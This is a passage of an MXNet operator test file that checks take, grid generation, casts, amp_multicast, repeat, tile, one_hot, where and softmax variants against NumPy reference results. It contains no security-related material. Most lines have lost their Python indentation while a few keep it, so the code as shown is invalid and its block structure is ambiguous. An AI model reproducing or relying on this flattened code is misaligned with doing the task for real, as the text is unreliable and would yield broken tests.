        # accumulate 1.0 into the slice selected by `idx` along `axis`, keeping
        # all other axes whole; equivalent to the original per-axis branches
        # for any input rank
        if not 0 <= axis < grad_in.ndim:
            raise ValueError("axis %d is not supported..." % axis)
        grad_in[(slice(None),) * axis + (idx,)] += 1.0
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0].asnumpy(), np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
                i = np.clip(i, 0, data_shape[axis] - 1)
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad.asnumpy())
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
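# Quick self-checking reference (illustrative; the `_take_demo` name is ad hoc)
# for the three index modes exercised above, mirroring numpy.take semantics:
# 'clip' clamps indices into [0, n-1], 'wrap' reduces them modulo n, and
# 'raise' errors on any out-of-range index.
_take_demo = np.array([10., 20., 30.])
assert np.take(_take_demo, [5], mode='clip')[0] == 30.  # 5 clamped to 2
assert np.take(_take_demo, [4], mode='wrap')[0] == 20.  # 4 % 3 == 1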
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'].asnumpy(), grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'].asnumpy(), grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
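# Note (illustrative) on the affine backward check above: each target pixel
# (i, j) corresponds to a homogeneous normalized coordinate [x_norm, y_norm, 1]
# with x_norm = -1 + j * 2 / (W - 1) and y_norm = -1 + i * 2 / (H - 1); the
# `tmp` matrix stacks these coordinates, so d(grid)/d(affine) reduces to the
# matrix product used to form grad_est.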
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r.asnumpy(), data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0].asnumpy(), X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0].asnumpy(), X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
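# Worked round-to-nearest-even example (illustration only): float16 has an
# 11-bit significand, so the spacing between representable values at 2048 is 2.
# 2049.0 therefore ties between 2048 and 2050 and rounds to the neighbour with
# an even mantissa: np.float16(2049.0) == np.float16(2048.0).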
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
        for in_val, model_fp32_val, np_fp32_val in zip(input_np, sym_output, expected_output):
            assert (model_fp32_val == np_fp32_val) or \
                   (np.isnan(model_fp32_val) and np.isnan(np_fp32_val)), \
                'fp16->fp32 cast mismatch: with input value {}, model_fp32 = {}, numpy_fp32 = {}'.format(
                    in_val, model_fp32_val, np_fp32_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
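# Minimal usage sketch (not invoked by the test runner): amp_multicast widens
# every input to the widest floating point type among them, float32 here.
def _demo_amp_multicast_promotion():
    a = mx.nd.ones((2, 2), dtype=np.float16)
    b = mx.nd.ones((2, 2), dtype=np.float32)
    out_a, out_b = mx.nd.amp_multicast(a, b, num_outputs=2)
    assert out_a.dtype == np.float32 and out_b.dtype == np.float32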
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats).asnumpy()
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis).asnumpy()
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
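# Sketch of the gradient identity test_repeat_backward checks element-wise:
# for repeat with `repeats` copies, each input element accumulates the sum of
# the output gradients over its copies.
def _demo_repeat_grad_identity():
    g = np.arange(6.0)                 # upstream gradient for repeat(x, 2), len(x) == 3
    summed = g.reshape(3, 2).sum(axis=1)
    assert np.array_equal(summed, np.add.reduceat(g, [0, 2, 4]))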
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
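# Sketch (not invoked by the test runner): indices outside [0, depth) produce
# all-zero rows, which is what the `0 <= idx < depth` guard above encodes.
def _demo_one_hot_out_of_range():
    out = mx.nd.one_hot(mx.nd.array([0, 5, -1], dtype=np.int32), depth=3)
    expected = np.array([[1, 0, 0], [0, 0, 0], [0, 0, 0]], dtype=np.float32)
    assert same(out.asnumpy(), expected)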
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert same(expect_out, out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
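# Sketch of the identity the expected_fwd above relies on:
# softmin(x) == softmax(-x) along the same axis.
def _demo_softmin_is_negated_softmax():
    x = mx.nd.array([1.0, 2.0, 3.0])
    assert_almost_equal(mx.nd.softmin(x).asnumpy(), mx.nd.softmax(-x).asnumpy())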
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
